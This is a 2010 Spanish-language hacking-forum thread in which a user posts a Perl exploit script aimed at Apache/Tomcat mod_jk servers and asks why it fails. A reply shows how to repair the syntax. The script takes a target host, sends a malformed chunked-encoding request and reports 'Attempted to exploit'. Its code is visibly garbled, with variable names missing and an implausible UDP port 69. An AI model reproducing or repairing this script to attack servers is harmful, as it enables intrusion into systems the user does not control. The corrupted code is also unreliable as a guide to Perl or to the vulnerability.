elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [?]Perl ¿Qué estoy haciendo mal?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [?]Perl ¿Qué estoy haciendo mal?  (Leído 2,065 veces)
Fritos

Desconectado Desconectado

Mensajes: 39



Ver Perfil
[?]Perl ¿Qué estoy haciendo mal?
« en: 15 Junio 2010, 14:12 pm »

Buenas, según el compilador tengo el siguiente error en la siguiente linea:
Código:
syntax error at pruebaa.pl line 17, near "="

y aquí el codigo en cuestión:

Código:
#!/usr/bin/perl -w

use IO::Socket;

 "= Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "\n By Sapient2003\n";
  die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";

 "= GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";

  = IO::Socket::INET->new(                          [Esta es la linea)))
        PeerAddr => [0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host [0]\n";
print  ;
print "Attempted to exploit [0]\n";
close();



En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: [?]Perl ¿Qué estoy haciendo mal?
« Respuesta #1 en: 15 Junio 2010, 15:21 pm »

Código
  1.  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u


En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
Fritos

Desconectado Desconectado

Mensajes: 39



Ver Perfil
Re: [?]Perl ¿Qué estoy haciendo mal?
« Respuesta #2 en: 15 Junio 2010, 18:27 pm »

Código
  1.  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u

Sí vas a comentar se más explicito, no para sumar absurdos mensajes.
Gracias.
En línea

xassiz_

Desconectado Desconectado

Mensajes: 273


Ich werde dich töten..


Ver Perfil WWW
Re: [?]Perl ¿Qué estoy haciendo mal?
« Respuesta #3 en: 15 Junio 2010, 19:32 pm »

Código
  1.  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u

Sí vas a comentar se más explicito, no para sumar absurdos mensajes.
Gracias.
Así quieres que te ayuden? ¬¬

Código
  1. my $NombreDeAlgunaVariable  = IO::Socket::INET->new(
En línea



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Pasar valores a URL metodo GET, que estoy haciendo mal?
.NET (C#, VB.NET, ASP)
TrashAmbishion 5 2,330 Último mensaje 30 Mayo 2012, 00:14 am
por seba123neo
Alocacion dinamica de memoria; String, ¿Que estoy haciendo mal?
Programación C/C++
astinx 2 1,656 Último mensaje 4 Junio 2012, 02:15 am
por astinx
ayuda estoy haciendo un encriptador « 1 2 »
Programación Visual Basic
Arconte 10 5,058 Último mensaje 11 Julio 2012, 09:26 am
por Yoghurt
Que estoy haciendo mal con el Man In The Middle +
Hacking
danihack007 6 3,976 Último mensaje 27 Octubre 2013, 14:47 pm
por reygun30012
Que estoy haciendo mal arreglo? (Solucionado) « 1 2 »
Programación C/C++
nolasco281 16 4,358 Último mensaje 4 Febrero 2014, 06:58 am
por x64core
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines